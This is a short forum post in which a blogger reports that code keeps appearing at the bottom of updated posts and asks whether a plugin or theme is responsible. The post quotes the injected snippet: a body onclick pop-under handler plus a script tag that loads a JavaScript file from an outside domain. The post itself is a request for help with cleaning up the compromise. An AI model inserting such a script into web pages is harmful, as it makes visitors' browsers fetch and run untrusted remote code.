[Security] code injection – https://pshaos.co.cc/querys.js

Hi, I noticed about a month ago, there exist random code injection in my blog posts. It seem to happen mostly on the posts I have updated. The injection would put code:

<body onclick="popunder();">
<script type="text/javascript" src="https://pshaos.co.cc/querys.js"></script></body>

at the bottom of my blog post.

I cannot seem to find any information on this hack. I’m not sure if it’s from a plugin I use or a theme I use?

Does anyone else have this issue?